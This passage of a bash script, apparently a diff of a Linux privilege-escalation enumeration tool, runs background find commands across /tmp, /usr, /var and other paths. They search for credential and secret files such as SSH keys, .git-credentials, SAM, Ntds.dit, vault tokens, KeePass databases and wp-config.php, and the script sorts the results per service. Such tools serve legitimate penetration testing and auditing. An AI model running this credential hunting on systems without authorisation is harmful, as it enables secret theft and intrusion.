\"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYS=`eval_bckgrd "find /sys -name \"*.socket\" -o -name \"*.timer\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.socket\" -o -name \"*.timer\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.socket\" -o -name \"*.timer\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_TMP=`eval_bckgrd "find /tmp -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"sess_*\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"agent*\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_USR=`eval_bckgrd "find /usr -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"ssh*config\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_VAR=`eval_bckgrd "find /var -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"sess_*\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - - - wait # Always wait at the end - CONT_THREADS=0 #Reset the threads counter - - #GENERATE THE STORAGES OF THE FOUND FILES - PSTORAGE_SYSTEMD=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/systemd|^/sys|^/system|^$GREPHOMESEARCH|^/lib32|^/etc|^/var|^/applications|^/cdrom|^/private|^/media|^/srv|^/.cache|^/sbin|^/mnt|^/lib|^/tmp|^/snap|^/lib64|^/run|^/bin|^/usr|^/opt" | grep -E ".*\.service$" | sort | uniq | head -n 70) - PSTORAGE_TIMER=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/systemd|^/sys|^/system|^$GREPHOMESEARCH|^/lib32|^/etc|^/var|^/applications|^/cdrom|^/private|^/media|^/srv|^/.cache|^/sbin|^/mnt|^/lib|^/tmp|^/snap|^/lib64|^/run|^/bin|^/usr|^/opt" | grep -E ".*\.timer$" | sort | uniq | head -n 70) - PSTORAGE_SOCKET=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/systemd|^/sys|^/system|^$GREPHOMESEARCH|^/lib32|^/etc|^/var|^/applications|^/cdrom|^/private|^/media|^/srv|^/.cache|^/sbin|^/mnt|^/lib|^/tmp|^/snap|^/lib64|^/run|^/bin|^/usr|^/opt" | grep -E ".*\.socket$" | sort | uniq | head -n 70) - PSTORAGE_DBUS=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) - PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "mysql$" | sort | uniq | head -n 70) - PSTORAGE_MARIADB=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) - PSTORAGE_POSTGRESQL=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) - PSTORAGE_APACHE=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "sites-enabled$|000-default\.conf$" | sort | uniq | head -n 70) - PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/tmp|^/mnt|^/private|^/var" | grep -E "sess_.*$" | sort | uniq | head -n 70) - PSTORAGE_PHP_FILES=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_WORDPRESS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) - PSTORAGE_DRUPAL=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E '/default/settings.php' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_MOODLE=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E 'moodle/config.php' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "config\.php$" | sort | uniq | head -n 70) - PSTORAGE_TOMCAT=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) - 